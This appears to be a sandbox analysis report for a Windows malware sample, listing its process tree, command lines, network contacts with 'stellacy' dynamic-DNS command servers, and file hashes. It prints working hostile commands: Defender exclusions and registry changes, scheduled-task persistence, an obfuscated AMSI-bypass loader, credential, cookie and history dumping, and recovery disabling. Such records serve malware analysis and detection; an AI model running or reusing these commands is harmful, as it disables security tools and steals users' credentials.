C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe"

C:\Users\$77main1.exe

"C:\Users\$77main1.exe" 0

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7D8C.tmp\7D8D.tmp\7D8E.bat C:\Users\$77main1.exe 0"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-MpPreference -ExclusionPath 'C:\' -Force

C:\Users\$77Redownloader.exe

"C:\Users\$77Redownloader.exe" -o"C:\Users\Admin\AppData\Local\Microsoft\Windows" -y

C:\Windows\system32\reg.exe

Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatIdDefaultAction" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147772079" /t REG_SZ /d "6" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147735505" /t REG_SZ /d "6" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147745502" /t REG_SZ /d "6" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t "REG_DWORD" /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "5" /t "REG_SZ" /d "6" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "1" /t "REG_SZ" /d "6" /f

C:\Windows\system32\timeout.exe

timeout 10

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

"C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe"

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe

"C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /RU Admin /create /tn "$77Stellacy.job" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe" /sc minute /mo 1 /RL HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /RU Admin /create /tn "$77SX.job" /tr "'C:\Windows\System32\Wscript.exe'C:\Users\Admin\AppData\Local\Microsoft\Windows\$77vbs.vbs" /sc minute /mo 40 /RL HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks /RU Admin /create /tn "$77STLR.job" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe" /sc onstart /RL HIGHEST /f

C:\Windows\system32\timeout.exe

timeout 10

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "$77Quasar.job" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe" /rl HIGHEST /f

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe 3d7545f5200a47d233b3f2f8f659efad WVQAETX4RU+OCJDHATFoIA.0.1.0.0.0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe

"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4cciCKuj10fS4tEFtsNPmrL/0jPo2AcIdfc9jK0U15Lp5iXQGku3ZLiCUn4WwDSh+A0ftN5CXUAmVy5X4PPHFWMzuIK7S46Iv9KhQeGUN+idJw7zi086Au7DP0yct2lQY=

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe

"C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe"

C:\Windows\system32\timeout.exe

timeout 20

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:WanTajdusvCi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$YbAhvEdfwiywiX,[Parameter(Position=1)][Type]$XAGLRCYBxk)$aUEeznrsWJp=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$aUEeznrsWJp.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$YbAhvEdfwiywiX).SetImplementationFlags('Runtime,Managed');$aUEeznrsWJp.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$XAGLRCYBxk,$YbAhvEdfwiywiX).SetImplementationFlags('Runtime,Managed');Write-Output $aUEeznrsWJp.CreateType();}$vfvBfeSrphbGm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$rhAIJHZXwnCuUb=$vfvBfeSrphbGm.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$tOkucufcqJuEeHBOXif=WanTajdusvCi @([String])([IntPtr]);$sBxwAOIYsTUghGSQmOhzBI=WanTajdusvCi 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$rbFjmeZKjzf=$vfvBfeSrphbGm.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$ZMaZtRoFFGmQJZ=$rhAIJHZXwnCuUb.Invoke($Null,@([Object]$rbFjmeZKjzf,[Object]('Load'+'LibraryA')));$NDNmMGzHCxnxcqqmU=$rhAIJHZXwnCuUb.Invoke($Null,@([Object]$rbFjmeZKjzf,[Object]('Vir'+'tual'+'Pro'+'tect')));$smSFNae=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZMaZtRoFFGmQJZ,$tOkucufcqJuEeHBOXif).Invoke('a'+'m'+'si.dll');$RJWkHcQIUZqPNUrix=$rhAIJHZXwnCuUb.Invoke($Null,@([Object]$smSFNae,[Object]('Ams'+'iSc'+'an'+'Buffer')));$WhhbfUqHtK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NDNmMGzHCxnxcqqmU,$sBxwAOIYsTUghGSQmOhzBI).Invoke($RJWkHcQIUZqPNUrix,[uint32]8,4,[ref]$WhhbfUqHtK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$RJWkHcQIUZqPNUrix,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NDNmMGzHCxnxcqqmU,$sBxwAOIYsTUghGSQmOhzBI).Invoke($RJWkHcQIUZqPNUrix,[uint32]8,0x20,[ref]$WhhbfUqHtK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:LPpCafCnPhGW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rbwbyRJwDfjMMc,[Parameter(Position=1)][Type]$BhvZKaLGRD)$mvwfdZfGBQc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$mvwfdZfGBQc.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$rbwbyRJwDfjMMc).SetImplementationFlags('Runtime,Managed');$mvwfdZfGBQc.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$BhvZKaLGRD,$rbwbyRJwDfjMMc).SetImplementationFlags('Runtime,Managed');Write-Output $mvwfdZfGBQc.CreateType();}$CxKhFyPBjiDDB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$CdjVPztmwZThlQ=$CxKhFyPBjiDDB.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PgQSsNxxivDMKKUvVcQ=LPpCafCnPhGW @([String])([IntPtr]);$VVrxkLvpZIlYISqOIcGKFw=LPpCafCnPhGW 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aEaENWQeyqy=$CxKhFyPBjiDDB.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$ptJYyEEyVqFZiM=$CdjVPztmwZThlQ.Invoke($Null,@([Object]$aEaENWQeyqy,[Object]('Load'+'LibraryA')));$bHkrZewmoHwTPxthi=$CdjVPztmwZThlQ.Invoke($Null,@([Object]$aEaENWQeyqy,[Object]('Vir'+'tual'+'Pro'+'tect')));$GYnbwZW=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptJYyEEyVqFZiM,$PgQSsNxxivDMKKUvVcQ).Invoke('a'+'m'+'si.dll');$cvXEVGvFkffjFmvEu=$CdjVPztmwZThlQ.Invoke($Null,@([Object]$GYnbwZW,[Object]('Ams'+'iSc'+'an'+'Buffer')));$BNQEsTfAgW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bHkrZewmoHwTPxthi,$VVrxkLvpZIlYISqOIcGKFw).Invoke($cvXEVGvFkffjFmvEu,[uint32]8,4,[ref]$BNQEsTfAgW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$cvXEVGvFkffjFmvEu,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bHkrZewmoHwTPxthi,$VVrxkLvpZIlYISqOIcGKFw).Invoke($cvXEVGvFkffjFmvEu,[uint32]8,0x20,[ref]$BNQEsTfAgW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{877d7f65-92aa-4771-b2cf-8fde54bedb2c}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c compile.bat

C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe

C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{e6194327-a952-4558-90c8-ce6936860160}

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c compile.bat

C:\Users\Admin\AppData\Local\Temp\winhlp32.exe

C:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"

C:\Users\Admin\AppData\Local\Temp\splwow64.exe

C:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"

C:\Users\Admin\AppData\Local\Temp\hh.exe

C:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c compile.bat

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\xwizard.exe

C:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

C:\Windows\system32\ReAgentc.exe

reagentc.exe /disable

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\reagentc.exe"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\reagentc.exe" /grant *S-1-5-32-544:F /T /C /Q

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\reagent.dll"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\reagent.dll" /grant *S-1-5-32-544:F /T /C /Q

C:\Windows\system32\taskkill.exe

taskkill /im "SecurityHealthSystray.exe" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "MRT" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "MRT.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "2" /t REG_SZ /d "rkill.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "3" /t REG_SZ /d "rkill32.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "4" /t REG_SZ /d "rkill64.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "5" /t REG_SZ /d "MBSetup.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "6" /t REG_SZ /d "mbam.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "7" /t REG_SZ /d "mbar.exe" /f

C:\Windows\system32\timeout.exe

timeout 2

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 stellacy.duckdns.org udp
US 87.249.134.21:55562 stellacy.duckdns.org tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 itroublvehacker.gq udp
US 8.8.8.8:53 api64.ipify.org udp
US 104.237.62.213:443 api64.ipify.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 213.62.237.104.in-addr.arpa udp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 stellacy.ydns.eu udp
SE 193.138.218.173:55562 stellacy.ydns.eu tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 stellacy.tk udp
IE 3.249.173.109:55562 stellacy.tk tcp
US 8.8.8.8:53 stellacy2.duckdns.org udp
SE 193.138.218.173:55562 stellacy2.duckdns.org tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 stellacy.duckdns.org udp
US 87.249.134.21:55562 stellacy.duckdns.org tcp
SE 193.138.218.173:55562 stellacy2.duckdns.org tcp

Files

C:\Users\$77main1.exe

MD5 40f541872b9b1f1da056ac6d4bc90ea4
SHA1 6e121d49311a8df04a70b6de6069460f2d55f609
SHA256 65453a408cdcd028c8e1b091abe9397d73e2cba9708b71feac6c9ccaa497ce90
SHA512 8456bd7ea4f898a96bd62b870f2aab466eaa4f0b0f446a108f16a9fb9ef84cd433ec9125931875138b281a9347f8ab9d99bc9d3dc54e89fb8e268f151d6dc74e

C:\Users\Admin\AppData\Local\Temp\7D8C.tmp\7D8D.tmp\7D8E.bat

MD5 ad9f604467f73ca7ddfef6f71dcf4798
SHA1 544808b2d40f5249b65c6e1e4abcd32f3af1a896
SHA256 7b8951b26d5ddf383a7ff37e5f2579be975d8702f7109dbc8f8393563a720ef0
SHA512 c59c1777bb07e82e35325274460adffd4b4ca216fbdc20c694ee92af772d9ce1a45ba18bd2c626083beef8e95bae82fb365414ca63100e6cc6262c2459a575f3

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gvvr54mu.m4x.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\$77Redownloader.exe

MD5 067d274dc271710cb8afd7c0680958fe
SHA1 4282104ec316c3452a81afc623c61ed348331436
SHA256 c53fbf5e1b8a3c6c3930073c359a07aa6fcccfb1a0275dab49ed6584c20aa051
SHA512 3c3a4c4678c735419d6e92570e5c9fd0cd5b34a46bb025b71c8925a27c64f9d3e5d20b16610e3085477c88b309dcbe4335aa3d6c3bac334ab461759f1320a29c

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

MD5 9d972046c0e663416177f42d19f38e35
SHA1 23aeec718eed2be8adf5380311fc787db03bfc43
SHA256 ad541a7a9372fb33689839ac297536ff01cab78c51df04c4334cf4ce2dd4e9a4
SHA512 25e9ba52944348c5ce54df6da8efc5025aa9b8c7e4fe25f56a386f285878c3d1ef27dd5fcc22e9c51dfe25a811a0484d314b21ecfdc352d2f4bdade4e68bf808

C:\Users\Admin\AppData\Local\Microsoft\Windows\Backup.bat

MD5 73336bee4fa2b1c3751fa012c9333a79
SHA1 2cc55d9440ed3c17e6b05466c10334b0d3ef0408
SHA256 435662c5b86525b076aa25aa55f06ab2f41bf34bb032544c466feac53ea378b2
SHA512 8eefbe6eb117387ab6a88a6a7d4aa919d935df22e4d60ebb3247462f9df3ea76ec4293dd2d57445a40a9c2c23188900a297e0543cec6e9ef54555617163852b8

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe

MD5 b7062a62e271b7dd402b7406f8a611ad
SHA1 952cbd23fd41cbc40d17c988de946ec983d262de
SHA256 d93529443f83e24a4ca90e835ab5b46fc83337862e5ab08343722945a002279c
SHA512 2f7aec552d2bcc53a218e4353c29f71e0b0af4b0c4a51c59f4ad4116e5cf46bde4584d61d3738260fb48fa03a79ec0202ba750e6e8434f4b0d3e12560fa94867

C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe

MD5 88ab0bb59b0b20816a833ba91c1606d3
SHA1 72c09b7789a4bac8fee41227d101daed8437edeb
SHA256 f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312
SHA512 05cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857

C:\Users\Admin\AppData\Local\Temp\config

MD5 1ba367d0f9aac0f650e65ab7401776c0
SHA1 75cf3295125cfaa0c247ebccc57e63f915198683
SHA256 68c4ec552c98f3b5a4744e4eefadd6364dc8075c2e718b7bcbfc76625aa60d03
SHA512 45ccdf02314fe01948aa2ecddb3b50f68d5b32d8542e3a3aeaf3f2920e2285d3b75ebb81b9eb9fb9e0a446af5a3708720e07672874d5d38871dbdcd09483449c

C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe

MD5 964c5fffcba7f353cf12d09675a46de6
SHA1 9462c1249ef86c39da01b7480f1b2ce4a2a1a7b9
SHA256 b54e5acf0ab77f4eadf2920814d9bb3396e678fc5805fb296f9f59c41a1c52ed
SHA512 ab6dd5c11abc1abf164532f50a42584189ff1a812b255221a9705dfc47f57120e7d7f241bbb802114de79d165b002283b18a6c96b2e6e3ddc4b062757f0f8565

C:\Users\Admin\AppData\Local\Temp\compile.vbs

MD5 ca906422a558f4bc9e471709f62ec1a9
SHA1 e3da070007fdeae52779964df6f71fcb697ffb06
SHA256 abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee
SHA512 661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b

C:\Users\Admin\AppData\Local\Temp\compile.bat

MD5 808099bfbd62ec04f0ed44959bbc6160
SHA1 f4b6853d958c2c4416f6e4a5be8a11d86f64c023
SHA256 f465a1bd2f9a3efcf0589f0b1c234d285f2bebf7416b324271d987a282915ca8
SHA512 e4f75253a402f0f5d5c651cde045757dad0d4312be023fabf279d7c053fde6ba63cf387551a0451585a87f929634e0bfa73a06dac85ecd1bb5bc0b72bb98e1f0

C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe

MD5 053778713819beab3df309df472787cd
SHA1 99c7b5827df89b4fafc2b565abed97c58a3c65b8
